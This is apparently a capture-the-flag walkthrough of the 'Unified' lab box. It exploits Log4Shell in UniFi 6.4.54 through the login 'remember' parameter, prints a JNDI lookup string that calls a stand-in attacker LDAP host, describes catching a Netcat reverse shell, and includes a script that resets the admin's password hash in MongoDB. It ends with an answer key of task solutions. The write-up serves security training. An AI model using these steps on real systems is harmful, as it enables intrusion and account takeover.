This write-up explores the effects of exploiting Log4j in a very well-known network appliance monitoring system called "UniFi".
This box will show you how to set up and install the packages and tools needed to exploit UniFi through the Log4j vulnerability, manipulating a POST parameter called remember to obtain a reverse shell on the machine. You will then change the administrator's password by altering the hash stored in the MongoDB instance running on the system, which grants access to the administration panel and leads to the disclosure of the root SSH password.
Enumeration
Click on Spawn Machine to get the target IP address:
Network scan using Nmap
- -sC: Performs a script scan using the default set of scripts
- -sV: Version detection
The scan reveals four open ports: 22, 6789, 8080 and 8443. Port 8080 runs an HTTP proxy that redirects requests to port 8443, which serves an SSL web server. We take note that the HTTP title of the page on port 8443 is "UniFi Network".
Accessing the page in a browser presents the UniFi web portal login page, with the version number 6.4.54 shown on it. Whenever we come across a version number it is always a good idea to research that particular version.
Exploiting UniFi 6.4.54 with Log4j Vulnerability
A quick Google search for "UniFi 6.4.54 exploit" reveals an article that discusses the in-depth exploitation of the CVE-2021-44228 vulnerability within this application.
Learn more: "Another Log4j on the Fire: Unifi". This resource covers the Log4j vulnerability's impact on the UniFi platform, how it is exploited, its implications for UniFi users, and recommendations for mitigating the risk.
This Log4j vulnerability (CVE-2021-44228, also known as Log4Shell) is exploited by injecting a JNDI lookup string such as ${jndi:ldap://attacker:1389/o} into a value that the application logs. A vulnerable Log4j version resolves the lookup at logging time, connects to the attacker-controlled LDAP server and loads the object it returns. That gives the attacker arbitrary code execution, and therefore arbitrary operating system command execution, on the server running the application, which typically fully compromises the application and all of its data.
To determine whether this is the case, we log in through FoxyProxy so that the POST request to the /api/login endpoint is passed to Burp Suite, which intercepts it as a man-in-the-middle. The request can then be edited to inject the payload. A separate module covers intercepting web requests in more depth.
First, we attempt to log in with throwaway credentials (test), since we are not trying to authenticate but only to capture the request. Burp Suite captures the login request and lets us modify it.
Before modifying the request, send this HTTPS request to Burp Suite's Repeater module by pressing CTRL+R.
Gaining Reverse Shell through JNDI:LDAP Exploitation
The Exploitation section of the article mentioned above says the payload goes into the remember parameter. Because the POST data is sent as a JSON object and the payload contains braces {}, we enclose it in double quotes " so that it is parsed as a string rather than as a nested JSON object.
We input the payload into the remember field as shown above to find out whether an injection point exists. If the request causes the server to connect back to us, the application is vulnerable.
- JNDI is the acronym for the Java Naming and Directory Interface API. By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems, such as database servers and messaging systems.
- LDAP is the acronym for Lightweight Directory Access Protocol, which is an open, vendor-neutral, industry-standard application protocol for accessing and maintaining distributed directory information services over the Internet or a Network. The default port that LDAP runs on is port 389.
After we hit Send, the Response pane displays the server's reply. It shows an error message stating that the payload is invalid, but despite the error the lookup is still evaluated, because Log4j processes the string at the moment the value is logged.
Let's start tcpdump on port 389 to monitor the network for incoming LDAP connections.
Analyzing network traffic with tcpdump
tcpdump is a command-line packet analyzer. It lets the user display TCP/IP and other packets transmitted or received on a network interface of the machine it runs on.
Open another terminal and start the capture. The command being broken down below is sudo tcpdump -i tun0 port 389:
- sudo: run the command as root, since capturing packets requires elevated privileges.
- tcpdump: the packet capture program, a command-line counterpart to Wireshark.
- -i: the interface to capture on (for example eth0, wlan0 or tun0; tun0 is the VPN interface facing the target).
- port 389: capture only traffic to or from the LDAP port on which we expect the callback.
After tcpdump has started, click Send in Burp Suite again:
The tcpdump output shows a connection arriving on our machine. This proves that the application is indeed vulnerable, since it is trying to connect back to us on LDAP port 389.
Rogue-JNDI Remote Code Execution
We need to install OpenJDK and Maven on our system in order to build a payload that we can send to the server and obtain remote code execution on the vulnerable system.
OpenJDK is the open-source Java Development Kit, used to build and run Java applications. Maven is a build tool (not an IDE) that manages a structured project, resolves its dependencies and compiles it into a .jar file.
OpenJDK comes pre-installed on Parrot and Kali:
These tools let us build and run the Rogue-JNDI Java application, which starts a local LDAP server, receives the connection back from the vulnerable server and serves the malicious Java object that executes our command.
Once OpenJDK is installed, we can install Maven. First, switch to the root user.
With the required packages installed, we download and build the Rogue-JNDI Java application. Clone its repository and build the package using Maven.
Run the command to build the package using Maven:
This creates a .jar file named RogueJndi-1.1.jar in the rogue-jndi/target/ directory. Now we can construct the payload to pass to RogueJndi-1.1.jar.
To use the Rogue-JNDI server we construct and pass it a payload that is responsible for giving us a shell on the affected system. We Base64-encode the payload to avoid quoting and encoding issues.
Note: for this walkthrough we use port 4444 to receive the shell.
After creating the payload, start the Rogue-JNDI application, passing the payload via the --command option and your tun0 IP address via the --hostname option.
Now that the server is listening locally on port 1389, open another terminal and start a Netcat listener on port 4444 to catch the reverse shell.
Go back to the intercepted POST request in Repeater and click Send.
Once the Rogue-JNDI server logs the incoming request, a shell spawns on our Netcat listener:
Privilege Escalation
Now we can work towards the administrator panel of the UniFi application and possibly extract the SSH secrets it uses for the managed appliances.
UniFi Administrator Panel Exploitation for SSH Access
First, check whether MongoDB is running on the target, since it might let us extract credentials to log in to the administrative panel. MongoDB is running on the target on port 27117.
Let's interact with MongoDB via the mongo command-line utility and attempt to extract the administrator password.
The output reveals an administrator user. Its password hash is stored in the x_shadow field, but in this instance it cannot be cracked with any password-cracking utility. Instead, we replace the x_shadow hash with one we generate ourselves, which resets the administrator's password and lets us authenticate to the administrative panel. To do this we use the mkpasswd command-line utility.
Open a new terminal and type the command below:
Once we've generated the SHA-512 hash, the output will look similar to the one above; however, because of the salt, the hash differs every time it is generated.
A salt is added to the hashing process so that identical passwords produce different hashes, which defeats precomputed attacks such as rainbow tables and forces an attacker to crack each hash separately.
Now replace the existing hash with the one we created:
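As an added example (not the write-up's own commands), this script generates a SHA-512 crypt hash and prints the mongo shell invocations that enumerate the admin document and swap the new hash into x_shadow. Port 27117 and the database name ace come from the write-up; matching the document by its name field is an assumption made here (the write-up matches on whatever db.admin.find() returns for the administrator), and the openssl fallback is an alternative to mkpasswd that produces the same $6$ format.

```shell
#!/bin/sh
# Added example, not part of the write-up: generate a SHA-512 crypt hash and
# the mongo shell commands that reset a UniFi admin's x_shadow. Port 27117
# and database "ace" are from the write-up; matching the admin document on
# its "name" field is an assumption.
set -eu

MONGO_PORT=27117
MONGO_DB=ace

# SHA-512 crypt hash ($6$<salt>$<digest>), as mkpasswd -m sha-512 produces.
# Falls back to openssl if mkpasswd (Debian "whois" package) is absent.
make_sha512_hash() {
  if command -v mkpasswd >/dev/null 2>&1; then
    mkpasswd -m sha-512 "$1"
  else
    openssl passwd -6 "$1"
  fi
}

# JS to run inside the mongo shell: list the admin documents.
find_admins_js() {
  printf 'db.admin.find()'
}

# JS that overwrites x_shadow for one admin. The hash contains $ characters;
# it is passed as a printf argument so the shell never expands them.
update_hash_js() {
  printf 'db.admin.update({"name":"%s"},{$set:{"x_shadow":"%s"}})' "$1" "$2"
}

# The mongo command line that evaluates one JS snippet against the UniFi DB.
# Single quotes around --eval keep $set and the hash intact on the target.
mongo_cmdline() {
  printf "mongo --port %s %s --eval '%s'" "$MONGO_PORT" "$MONGO_DB" "$1"
}

# Usage: ./reset_unifi_admin.sh <username> <new password>; prints the
# commands to run on the target rather than executing them.
if [ $# -eq 2 ]; then
  hash=$(make_sha512_hash "$2")
  mongo_cmdline "$(find_admins_js)"; echo
  mongo_cmdline "$(update_hash_js "$1" "$hash")"; echo
fi
```

Run db.admin.find() first and copy the exact name value from the output into the update, since the web login (and the query) is case-sensitive; then re-run the find to confirm x_shadow changed before trying the new password in the browser.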
Now visit the website and log in as the administrator. It is very important to note that the username is case-sensitive.
Authentication succeeds and we now have administrative access to the UniFi application.
UniFi offers an SSH Authentication setting, which allows you to administer the adopted access points over SSH from a console or terminal.
Navigate to Settings -> Site and scroll down to the SSH Authentication setting. SSH authentication with a root password has been enabled.
The page shows the root password in plaintext. Because the controller pushes these credentials to the devices it manages, anyone with access to this panel can read the root password for every one of them. Let's attempt to authenticate to the system as root over SSH.
Congratulations, you have finished the Unified box.
TASK Solutions
TASK 1: What ports are open?
Ans. 22, 6789, 8080, 8443
TASK 2: Name of the software that is running on the highest port?
Ans. UniFi Network
TASK 3: What is the version of the software that is running?
Ans. 6.4.54
TASK 4: What is the CVE for the identified vulnerability?
Ans. CVE-2021-44228
TASK 5: What is the version of Maven that we installed?
Ans. 3.6.3
TASK 6: What protocol does JNDI leverage in the injection?
Ans. LDAP
TASK 7: What tool do we use to intercept the traffic, indicating the attack was successful?
Ans. tcpdump
TASK 8: What port do we need to inspect intercepted traffic for?
Ans. 389
TASK 9: What port is the MongoDB service running on?
Ans. 27117
TASK 10: What is the default database name for UniFi applications?
Ans. ace
TASK 11: What is the function we use to enumerate users within the database in MongoDB?
Ans. db.admin.find()
TASK 12: What is the function to add data to the database in MongoDB?
Ans. db.admin.insert()
TASK 13: What is the function we use to update users within the database in MongoDB?
Ans. db.admin.update()
TASK 14: What is the password for the root user?
Ans. NotACrackablePassword4U2022